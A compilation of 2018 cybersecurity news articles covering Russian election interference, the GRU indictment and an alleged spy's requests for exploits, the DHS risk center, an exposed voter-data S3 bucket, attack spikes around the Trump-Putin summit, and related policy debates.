At a cybersecurity summit on Tuesday, Vice President Mike Pence said he was confident officials could prevent further meddling by foreign agents.

"We will repel any efforts to interfere in our elections," he said.

Republican Sen. Lindsey Graham of South Carolina said government agencies are "doing a lot of good work, but nobody knows about it." He lamented Trump's contradictory statements about whether he accepts the U.S. intelligence assessment that Russia meddled in the 2016 presidential election.

"What I think he needs to do is lead this nation to make sure the 2018 election is protected," Graham said recently on CBS' "Face the Nation." ''He needs to be the leader of the movement — not brought to the dance reluctantly. So, I hope he will direct his government, working with Congress, to harden the 2018 election before it's too late."

The debate over safeguarding U.S. elections comes as evidence of cyber threats piles up. Facebook announced Tuesday that it has uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms.

The company said it removed 32 accounts from Facebook and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts.

Earlier this month, Microsoft said it discovered that a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said Monday that additional analysis has confirmed that the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., has said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017.

Sen. Jeanne Shaheen, D-N.H., who is not running for re-election, told The Associated Press on Monday that someone contacted her office "claiming to be an official from a country."

A frequent critic of Russia, Shaheen said she didn't know if Moscow was behind the email received in November but had turned the matter over to the FBI.

Shaheen said another senator had been targeted besides McCaskill. "It's my understanding that there is, but I don't want to speak for other senators," she said. When asked if it was a Democratic senator, Shaheen nodded yes.

"People on both sides of the aisle have been beating the drum for two years now about the need for somebody to be accountable for cybersecurity across the government," Shaheen said.

National Intelligence Director Dan Coats said U.S. intelligence officials continue to see activity from individuals affiliated with the Internet Research Agency, whose members were indicted by U.S. special counsel Robert Mueller. Coats said they create new social media accounts disguised as those of Americans, then use the fake accounts to drive attention to divisive issues in America.

In the Obama administration, synchronizing federal agencies' work on election security would have likely been the job of the White House cybersecurity coordinator. Trump's national security adviser, John Bolton, abolished the post in May to remove a layer of bureaucracy from the NSC flow chart.

Under the current structure, the point man for election security is Rear Adm. Douglas Fears. Trump tapped Fears in early June as his deputy assistant to the president and homeland security and counterterrorism adviser.

Fears oversees the election security and other portfolios of the NSC's Cybersecurity Directorate and coordinates the federal government's response to disasters.

Homeland Security Secretary Kirstjen Nielsen says cyber threats are "an urgent, evolving crisis."

"Our adversaries' capabilities online are outpacing our stove-piped defenses," Nielsen said Tuesday. "In fact, I believe that cyber threats collectively now exceed the danger of physical attacks against us. This is a major sea change for my department and for our country's security."

Leaked Chats Show Alleged Russian Spy Seeking Hacking Tools
2.8.2018 securityweek BigBrothers

MOSCOW (AP) — Six years ago, a Russian-speaking cybersecurity researcher received an unsolicited email from Kate S. Milton.

Milton claimed to work for the Moscow-based anti-virus firm Kaspersky. In an exchange that began in halting English and quickly switched to Russian, Milton said she was impressed by the researcher's work on exploits — the digital lock picks used by hackers to break into vulnerable systems — and wanted to be copied in on any new ones that the researcher came across.

"You almost always have all the top-end exploits," Milton said, after complimenting the researcher about a post to her website, where she often dissected malicious software.

"So that our contact isn't one-sided, I'd offer you my help analyzing malicious viruses, and as I get new samples I'll share," Milton continued. "What do you think?"

The researcher — who works as a security engineer and runs the malware-sharing site on the side — always had a pretty good idea that Milton wasn't who she said she was. Last month, she got confirmation via an FBI indictment.

The indictment, made public on July 13, lifted the lid on the Russian hacking operation that targeted the 2016 U.S. presidential election. It identified "Kate S. Milton" as an alias for military intelligence officer Ivan Yermakov, one of 12 Russian spies accused of breaking into the Democratic National Committee and publishing its emails in an attempt to influence the 2016 election.

The researcher, who gave her exchanges with Milton to The Associated Press on condition of anonymity, said she wasn't pleased to learn she had been corresponding with an alleged Russian spy. But she wasn't particularly surprised either.

"This area of research is a magnet for suspicious people," she said.

The researcher and Milton engaged in a handful of conversations between April 2011 and March 2012. But even their sparse exchanges, along with a few digital breadcrumbs left behind by Yermakov and his colleagues, offer insight into the men behind the keyboards at Russia's Main Intelligence Directorate, or GRU.

It isn't unusual for messages like Milton's to come in out of the blue, especially in the relatively small world of independent malware analysts.

"There was nothing particularly unusual in her approach," the researcher said. "I had very similar interactions with amateur and professional researchers from different countries."

The pair corresponded for a while. Milton shared a piece of malicious code at one point and sent over a hacking-related YouTube video at another, but contact fizzled out after a few months.

Then, the following year, Milton got back in touch.

"It's been all work, work, work," Milton said by way of apology, before quickly getting to the point. She needed new lock picks.

"I know that you can help," she wrote. "I'm working on a new project and I really need contacts that can provide information or have contacts with people who have new exploits. I am willing to pay for them."

In particular, Milton said she wanted information on a recently disclosed vulnerability codenamed CVE-2012-0002 - a critical Microsoft flaw that could allow hackers to remotely compromise some Windows computers. Milton had heard that someone had already cobbled together a working exploit.

"I'd like to get it," she said.

The researcher demurred. The trade in exploits — for use by spies, cops, surveillance companies or criminals — can be a seedy one.

"I usually steer clear from any wannabe buyers and sellers," she told the AP.

She politely declined - and never heard from Milton again.

Milton's Twitter account — whose profile photo features "Lost" star Evangeline Lilly — is long dormant. The last few messages carry urgent, awkwardly worded appeals for exploits or tips about vulnerabilities.

"Help me find detailed description CVE-2011-0978," one message reads, referring to a bug in PHP, a coding language often used for websites. "Need a work exploit," the message continues, ending with a smiley face.

It isn't clear whether Yermakov was working for the GRU when he first masqueraded as Kate S. Milton. Milton's Twitter silence — starting in 2011 — and the reference to a "new project" in 2012 might hint at a new job.

In any case, Yermakov wasn't working for the anti-virus firm Kaspersky — not then and not ever, the company said in a statement.

"We don't know why he allegedly presented himself as an employee," the statement said.

Messages sent by the AP to Kate S. Milton's Gmail account were not returned.

The exchanges between Milton (Yermakov) and the researcher could be read in different ways.

They might show that the GRU was trying to cultivate people in the information security community with an eye toward getting the latest exploits as soon as possible, said Cosimo Mortola, a threat intelligence analyst at the cybersecurity company FireEye.

It's also possible that Yermakov might have initially worked as an independent hacker, hustling for spy tools before being hired by Russian military intelligence — a theory that makes sense to defense and foreign policy analyst Pavel Felgenhauer.

"For cyber, you have to hire boys that understand computers and everything the old spies at the GRU don't understand," Felgenhauer said. "You find a good hacker, you recruit him and give him some training and a rank — a lieutenant or something — and then he will do the same stuff."

The leak of Milton's conversations shows how the glare of publicity is revealing elements of the hackers' methods — and perhaps even hints about their private lives.

It's possible, for example, that Yermakov and many of his colleagues commute to work through the arched entrance to Komsomolsky 22, a military base in the heart of Moscow that serves as home to the alleged hacker's Unit 26165. Photos shot from inside show it's a well-kept facility, with a czarist-era facade, manicured lawns, flower beds and shady trees in a central courtyard.

The AP and others have tried to trace the men's digital lives, finding references to some of those indicted by the FBI in academic papers on computing and mathematics, on Russian cybersecurity conference attendee lists or — in the case of Cpt. Nikolay Kozachek, nicknamed "kazak" — written into the malicious code created by Fancy Bear, the nickname long applied to the hacking squad before their identities were allegedly revealed by the FBI.

One of Kozachek's other nicknames also appears on a website that allowed users to mine tokens for new weapons to use in the first-person shooter videogame "Counter Strike: Global Offensive" — providing a flavor of the hackers' extracurricular interests.

The AP has also uncovered several social media profiles tied to another of Yermakov's indicted colleagues — Lt. Aleksey Lukashev, allegedly the man behind the successful phishing of the email account belonging to Hillary Clinton's campaign chairman, John Podesta.

Lukashev operated a Twitter account under the alias "Den Katenberg," according to an analysis of the indictment as well as data supplied by the cybersecurity firm Secureworks and Twitter's "Find My Friends" feature.

A tipster using the Russian facial recognition search engine FindFace recently pointed the AP to a VKontatke account that, while using a different name, appears active and features photos of the same young, Slavic-looking man.

Many of his posts and his friends appear to originate from a district outside Moscow known as Voskresensky. The photos show him cross-country skiing at night, wading in emerald waters somewhere warm and visiting Yaroslavl, an ancient city northwest of Moscow. One video appeared to show Russia's 2017 Spasskaya Tower Festival, a military music festival popular with officers.

The AP could not establish with certainty that the man on the VKontatke account is Lukashev. Several people listed as friends either declined to comment when approached by the AP or said Lukashev's name was unknown to them.

Shortly thereafter, the profile's owner locked down his account, making his vacation snaps invisible to outsiders.

The exchanges between the cybersecurity researcher and Kate S. Milton are available here.

DHS Unveils National Risk Management Center
1.8.2018 securityweek   BigBrothers

Kirstjen Nielsen introduces National Risk Management Center

Secretary of Homeland Security Kirstjen Nielsen said on Tuesday that the U.S. Department of of Homeland Security (DHS) has launched The National Risk Management Center, a joint center housed within DHS that will enable the private sector and government to collaborate and devise solutions to reduce risk to critical infrastructure.

Announced at the DHS National Cybersecurity Summit today in New York City, the new center will focus on three things:

● Identify, assess, and prioritize efforts to reduce risks to national critical functions, which enable national and economic security;

● Collaborate on the development of risk management strategies and approaches to manage risks to national functions; and

● Coordinate integrated cross-sector risk management activities.

According to the DHS, the center will lead a series of activities that will help “define what is truly critical; create the frameworks by which government and industry collectively manage risk; and initiate specific cross-sector activities to address known threats.”

Notable attendees and participants at the Summit include, Vice President Mike Pence, Secretary of Energy Rick Perry, FBI Director Christopher Wray, Commander, U.S. Cyber Command and Director, National Security Agency General Paul M. Nakasone.

A live stream of the event can be watched online throughout the day.

Senator Urges Federal Agencies to Ditch Adobe Flash
28.7.2018 securityweek BigBrothers

United States Senator Ron Wyden on Wednesday sent a letter to national agencies demanding a collaboration on ending the government use of Adobe Flash.

Set to reach an end-of-life status in 2020, Adobe’s Flash Player is continually plagued by critical vulnerabilities. Two zero-days in the software were patched this year alone, but not before threat actors had exploited them in targeted attacks.

Immediately after Adobe announced plans to kill-off the plugin a year ago, Apple, Facebook, Google, Microsoft and Mozilla outlined plans to completely remove support for Flash from their products as well.

Sent to National Institute of Standards and Technology (NIST) Director Walter G. Copan, National Security Agency Director General Paul M. Nakasone, and Department of Homeland Security Secretary Kirstjen Nielsen, Senator Wyden’s letter (PDF) requests the end of government use of Flash by August 2019.

Senator Wyden cites not only the looming end of technical support for Flash, but also the inherited security vulnerabilities in the plugin as the main reason to dispose of it.

“Flash is widely acknowledged by technical experts to be plagued by serious, largely unfixable cybersecurity issues that could allow attackers to completely take control of a visitor’s computer, reaching deep into their digital life,” the letter reads.

The United States Computer Emergency Readiness Team (US-CERT) has warned about the risks of using Flash nearly a decade ago, the letter also reads.

“The U.S. government should begin transitioning away from Flash immediately, before it is abandoned in 2020,” Senator Wyden says. He also noted that the federal government has previously failed to transition from decommissioned software, as was the case with Windows XP, which cost millions for premium support after its end-of-life in 2014.

The three agencies, he says, provide the majority of cybersecurity guidance to government agencies, so they should ensure that federal workers are protected from cyber threat.

“To date, your agencies have yet to issue public guidance for the unavoidable transition away from Flash. A critical deadline is looming – the government must act to prevent the security risk posed by Flash from reaching catastrophic levels,” the letter reads.

The Senator asks NIST, NSA, and DHS to mandate that no new Flash-based content should be deployed on federal websites within 60 days and that all Flash-based content should be removed from the federal websites by August 1, 2019.

Flash should also be removed from the agencies’ employees’ computers by that date, Wyden said.

Cybersecurity, Compliance Slowing U.S. Government's Digital Transformation
24.7.2018 securityweek BigBrothers

Complex Compliance Requirements are Delaying U.S. Government's Digital Transformation, Study Shows

With trust in the U.S. government at an all-time low (the Pew Research Center says that only 3% of Americans trust Washington to do the right thing 'just about always'), the suggestion is that a new 'moonshot moment' is necessary for government. A new report (PDF) says that moment is possible with digital transformation.

Success, however, is dependent on three requirements: federal agencies must create a culture of innovation; must prioritize the citizen experience; and must implement an integrated approach to digital transformation.

Consulting firm ICF employed Wakefield Research to survey 500 federal employees to understand the opportunities and obstacles for federal digital transformation. The prize, says ICF, is reigniting citizen trust and satisfaction in government, regardless of the administration. Cybersecurity and compliance issues are among the greatest of the obstacles, with user satisfaction an additional problem.

Eighty-nine percent of the respondents said that security and privacy requirements significantly delay technological innovation. More than half of the respondents admitted to experiencing a cybersecurity incident after implementing a new digital initiative, while almost half of those said that the incident delayed future innovation.

The federal IT procurement process is also an inhibitor, with 91% of respondents saying it needs to be completely overhauled. More than 30% go so far as to recognize benefits in using unauthorized technologies that have not been officially sanctioned by the IT department.

ICF believes that the combination of security/compliance concerns and strict procurement policy is inhibiting the creativity of federal agencies. "Creating a culture of innovation," says the report, "requires encouraging staff within agencies to think outside the box and empowering them to follow through on new ideas by providing targeted support."

Baris Yener, an SVP at ICF, told SecurityWeek, "Compliance has become an overly-complex aspect of security in the government. This is due primarily to the fact that the public sector thinks of security as an afterthought, something that is tacked on to existing processes, rather than building solutions with a security-first mindset. Compliance will remain a hindrance," he added, "until the government and its agencies embrace a shift in thinking that prioritizes an integrated approach to creating tools and services. Once that shift takes place, and stakeholders from across departments are brought together, compliance will be simpler."

In the meantime, he does not believe that empowering creativity will necessarily lead to an unacceptable expansion of shadow IT within federal agencies.

"By embracing outside-the-box thinking, and fostering a culture that encourages creativity," he said, "those staff members will instead raise their hand to offer new solutions, rather than turn to shadow IT. Creative thinking needs to be nurtured and rewarded. If there's anything we know about the nature of cybersecurity today, it's that the threat landscape is constantly changing. Feds with a different perspective will be critical to navigating uncharted territory."

Essential to the moonshot moment of digital transformation is user engagement with the outcome. Ninety-seven percent of the survey respondents say that government agencies now have a greater responsibility than ever to provide the digital tools and services that will make a positive difference in citizens' lives. But 80% also said that government is prioritizing perfecting the technology over the citizen experience.

The extent to which regulations affect new digital technology can be seen by 44% of respondents claiming that compliance is the biggest priority when implementing a new digital technology, with 36% saying that speed of implementation is the prime priority. User adoption of that technology ranks second to last (30%), worsened only by the ability to measure its success (23%).

With such driving principles, ICF sees little chance of government maximizing the potential for engaging the trust of citizens. Federal staff accept the problem, with 92% suggesting that improving usability of the technology should be prioritized over technology development. "Instead of looking to the private sector primarily for technology solutions," suggests ICF, "federal leaders must implement user research and feedback loops that are designed to create and improve digital services."

This may seem a little surprising, since the issue of usability is understood and being tackled by new technologies in the private sector. The big development is the increasing use of artificial intelligence -- for example in reducing user friction in access control. However, Yener does not believe that such solutions can simply be transposed to the federal sector.

"For example," he told SecurityWeek, "when implementing new technologies like AI, the government needs to consider how to identify and document the standardization of those technologies, along with how it will be used within all agencies. Private sector by comparison has the freedom and flexibility to implement whatever would be beneficial to the business, with minimal standardization required or concern for other companies in their industry."

If project funding is available, the biggest obstacles to new digital developments are security concerns (41%), outdated policies (28%), skilled staff shortages (27%), complexity (22%), and lack of time (22%). Other obstacles include poor inter-office communication, difficulty in procuring services, and lack of support from senior management.

"To develop an integrated approach to digital transformation," says the report, "agencies should build a multidisciplinary team that executes technology implementation and prioritizes user adoption. Leaders need to ensure that every department -- including common omissions like HR -- is represented to better understand the needs of the entire organization as it works to apply digital transformation." Successful digital transformation, it adds, "will position the federal government to launch its next moonshot: digital transformation that reignites citizen trust and satisfaction in the government -- regardless of the administration."

EU Antitrust Officials Probe Thales, Gemalto Merger
24.7.2018 securityweek  BigBrothers

The European Union said Monday it has launched an anti-trust investigation into the planned purchase by French aerospace and defence group Thales of SIM manufacturer Gemalto.

The European Commission, the 28-nation EU's executive arm, said it wants to determine whether the merger will increase prices as well as reduce choice and innovation for customers of hardware security modules (HSM).

An HSM is hardware that "runs on encryption software to "generate, protect, and manage encryption keys used to protect data in a secure, tamper-resistant module," it said.

"Our society is increasingly dependent on data security solutions to secure all sorts of social, commercial or personal information," the EU's competition commissioner Margrethe Vestager said in a statement.

"We are opening this in-depth investigation to ensure that the proposed transaction between Thales and Gemalto would not lead to higher prices or less choice in hardware security modules for customers looking to safely encrypt their data," Vestager added.

In a deal valued at about 4.8 billion euros, Thales agreed in December to buy Gemalto, based in the Netherlands, outbidding French competitor Atos.

With the merger, Thales is aimming to become a global leader in digital security.

The commission expressed concern that the merger would reduce players in the market.

Gemalto is active in mobile platforms and services, mobile embedded software and products, smart cards, identification documents, government programs, machine to machine communication, and enterprise security.

The Commission said it has until 29 Noveber to take a decision.

Experts believe US Cyber Command it the only entity that can carry out ‘hack backs’
23.7.2018 securityaffairs BigBrothers

The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector.
The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector, and when appropriate, the military’s hacking unit should hit back, this is what three experts said at a panel organized by APCO.

The three experts with experience in the private sector, intelligence community and military, agreed that the private organization victims of cyber attacks have to delegate the response against the attackers to the US Cyber Command.

“I think if it’s going to happen, it’s best in the hands of the government,” said Sean Weppner, chief strategy officer at NISOS Group and a former DOD cyber officer.

The experts highlighted that private companies have no intelligence abilities to attribute the attacks to a specific threat actor and have no specific offensive capabilities to conduct hack backs.

Private companies not only have no capabilities to conduct hack backs, they are not legally authorized to do it.

“The U.S. government should decide how to retaliate against the worst attacks on the country’s private sector, and when appropriate, the military’s hacking unit should hit back, three experts said Monday.” reported CyberScoop.

“The controversial idea entails taking the fight to nefarious actors by attacking their computer network in-kind, probing for exfiltrated data and employing measures to retrieve or destroy stolen information.”

Alex Bolling, the former chief of operations at the CIA’s Information Operations Center, approached the problem of cyber attacks against critical infrastructure that in most of the cases are owned by private entities.

The response of attacks against critical infrastructure operated by private organizations must be delegated to the US Government.

In the majority of the cases, attacks against critical infrastructure are powered by persistent attackers and for this reason, a response requests specific cyber skills and the US CYBERCOM has them.

Speaking of the CYBERCOM Bolling said it is the “agency that is best resourced to respond to threats to [U.S.] national interests…[and] critical infrastructure in the energy, finance and wider commercial space,”

Hack backs the Air Force

Private companies cannot carry out hack backs if we want to avoid a digital far west. A private company that decides to target its attackers is anyway a serious threat to the overall digital community.

“For one, companies venturing out into foreign networks would run the risk of disrupting existing U.S. intelligence or military operations.” continues CyberScoop.

According to Edward Amoroso, CEO of Tag Cyber, the US CYBERCOM should isolate the specific target to hit and attack it limiting the risk of any collateral damage.

“I’d like to think there’s a lot of human intelligence and spy-craft that provides a really good view” to the government, said Amoroso.

Experts warn of the risk of hack back non-responsible party due to a wrong attribution of the attack.

Of course, every threat must be properly approached especially the ones that daily target the U.S. private sector. The three experts urge a proper cyber hygiene to mitigate the risks of cyber attacks and limit the necessity to carry out hack backs.

Robocalling Firm Exposes U.S. Voter Records
22.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and has been already indexed by searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files that included audio files with pre-recorded political messages for robocalls dials (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robcent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and files access after being responsibly alerted on the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.

Trump-Putin Meeting Puts Finland on Cyber-Attack Target List
22.7.2018 securityweek BigBrothers

Historically, Finland has not been targeted by a high number of cyber-attacks, but digital assaults spiked in the days prior to the July 16 meeting between U.S. President Donald Trump and Russian President Vladimir Putin in Helsinki.

The massive rise in cyber-attacks isn’t surprising, given the precedent established earlier this year, when Singapore received a massive wave of attacks from June 11 to June 12, during the Trump-Kim summit.

While most of the cyber-attacks observed during President Trump’s meeting with the North Korean leader appeared to originate from Russia, those observed last week were mainly launched from China, F5 reports.

The Finland and Singapore cyber-attacks showed some similarities in targeted ports, which included SIP port 5060, which is typically used by VoIP phones (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

The most attacked port in the new wave of assaults, however, was SSH port 22, followed by SMB port 445. SSH is often used for the secure remote administration of Internet of Things (IoT) devices, but vendors often secure devices with easily guessable credentials, which turns these products into easy targetes for cybercriminals.

“The device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks,” F5 notes.

The Finland assaults also targeted ports that weren’t seen in the Singapore attacks, including HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Despite the massive spike in cyber-attacks targeting Finland between July 12 and July 15, the country remained far behind top targeted countries. Compared to Canada, which typically makes it to top 10 but not top 5, Finland received on a small fraction of cyber-attacks on July 12 and July 14 and “doesn’t even register on the chart,” F5 says.

The top targeting countries during the spike were China (29%), United States (14%) and France (9%), followed by Italy (8%) and Russia (7%). Many of the attacks originated from networks usually seen launching such attacks, the security researchers say.

ChinaNet, consistently at the top of the threat actor network list globally, remained the top attacking network during the attack spike.

Such attacks, F5 notes, are possible because of the rise of poorly secured IoT devices. By targeting vulnerable devices, nation-states, spies, mercenaries, and others can easily launch attacks against anyone.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 notes.

Trump-Putin Meeting was the root cause of a spike of cyber attacks against Finland
22.7.2018 securityaffairs  BigBrothers

F5 experts observed a spike in the attacks in the days prior to the Trump-Putin meeting on July 16 that was held in Helsinki, Finland.
Important events represent an element of attraction for cyber attacks, in June we discussed the Trump-Kim summit and the way Singapore that held it was hit by an unprecedented number of attacks from June 11 to June 12.

At the time most of the cyber attacks were originated in Russia.

Let’s analyze the effect in the cyberspace of another event, the Trump-Putin meeting that was held in Helsinki in Finland that historically is not a privileged target of hackers.

The experts pointed out that they have no data to suggest the attacks against Finland were successful.

Once again researchers at security firm F5 analyzed the number of attacks that hit the location during the summit and made an interesting discovery, most of the cyber attacks were originated in China.

“On July 16th, President Trump met with Vladimir Putin in Helsinki, Finland. As expected, attacks against Finland skyrocketed days before the meeting. What’s interesting this time around is that Russia wasn’t the top attacker—perhaps because Trump was meeting with Putin? In this case, China was the top attacker.” reports the security firm F5.

Trump-Putin attacks

Experts observed many similarities between the attacks that were observed against the countries that hosted the two meeting. Hackers targeted the same ports, including included SIP port 5060 typically used by VoIP systems (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

Most of the attacks targeted SSH port 22 which is typically used for the secure remote administration of Internet of Things (IoT) devices. Attackers scan for devices configured with default credentials to compromise them with brute force attacks.

The second most targeted port was the SMB port 445.

“The challenge is that the device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks. ” continues F5.

Experts noticed that some ports targeted by the attacks during the Trump-Putin meeting were not hit during the Singapore summit, for example, the HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Experts highlighted that Finland is not included in the list of top-targeted countries.

Which were the other top targeting countries during the Helsinki meeting?

The top targeting countries were

China (29%);
United States (14%);
France (9%);
Italy (8%);
Russia (7%);
According to F5, ChinaNet was the top attacking network during the attack spike.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 concludes.

Ecuador to withdraw asylum for Julian Assange in coming weeks or days
22.7.2018 securityaffairs  BigBrothers

According to media, Ecuador is going to hand over the WikiLeaks founder Julian Assange to the UK in “coming weeks or even days.”
In 2012 a British judge ruled WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and spent the last years in its London embassy.

Now Ecuador is planning to withdraw its political asylum, likely next week, this means that Assange will leave the embassy and British authorities will catch him.

“Sources close to Assange said he himself was not aware of the talks but believed that America was putting ‘significant pressure’ on Ecuador, including threatening to block a loan from the International Monetary Fund (IMF) if he continues to stay at the embassy,” reported RT.

The newly-elected President of Ecuador Lenín Moreno arrived in London on Friday, officially the motivation of his travel is the participation at the Global Disability Summit on 24 July 2018, but media reports suggest he was reaching an agreement with UK government to withdraw the asylum protection of Assange.

“ECUADOR’S PRESIDENT Lenin Moreno traveled to London on Friday for the ostensible purpose of speaking at the 2018 Global Disabilities Summit (Moreno has been using a wheelchair since being shot in a 1998 robbery attempt). The concealed, actual purpose of the President’s trip is to meet with British officials to finalize an agreement under which Ecuador will withdraw its asylum protection of Julian Assange, in place since 2012, eject him from the Ecuadorian Embassy in London, and then hand over the WikiLeaks founder to British authorities.” wrote Glenn Greenwald on the Intercept.

Glenn Greenwald

· 20 Jul
The editor-in-chief of RT says the Ecuadorian government - now highly subservient to the west under @Lenin's government - will withdraw its asylum grant to Julian Assange and hand him over to the UK. People pretending to believe in press freedom will cheer if he's sent to the US: https://twitter.com/M_Simonyan/status/1019958571889577985 …

Glenn Greenwald

Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

6:05 PM - Jul 20, 2018
590 people are talking about this
Twitter Ads info and privacy

Glenn Greenwald

· 20 Jul
Replying to @ggreenwald
Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

Glenn Greenwald

The above report that UK & Ecuador are preparing to turn Assange over to UK appears to be true. Big question is whether the US will indict him & seek his extradition, the way Sessions & Pompeo vowed they would. Can't wait to see how many fake press freedom defenders support that.

8:37 PM - Jul 20, 2018
503 people are talking about this
Twitter Ads info and privacy
In May 2017, Swedish prosecutors dropped their preliminary investigation into an allegation of rape against Julian Assange, but the Wikileaks founder fears that he would be extradited to the US, where he is facing federal charges his role in the Chelsea Manning‘s case.

Julian Assange

Three months ago, Ecuador blocked Assange from accessing the internet, mainly to avoid that he could express support to Catalonia and its dispute with the Spanish Government for the independence.

According to Ecuador, Assange had violated the agreement to refrain from interfering in other states’ politics.

Which are current charges against Assange in the UK?

The only criminal proceeding against Assange is a pending 2012 arrest warrant for “failure to surrender” that is considered by experts a minor bail violation charge.

This charge carries a prison term of three months and a fine, though it is possible that the time Assange has already spent in prison in the UK could be counted against that sentence.

Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
20.7.2018 securityweek BigBrothers

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 2018 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S Federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has little real consequences beyond drawing yet more attention to the issue.

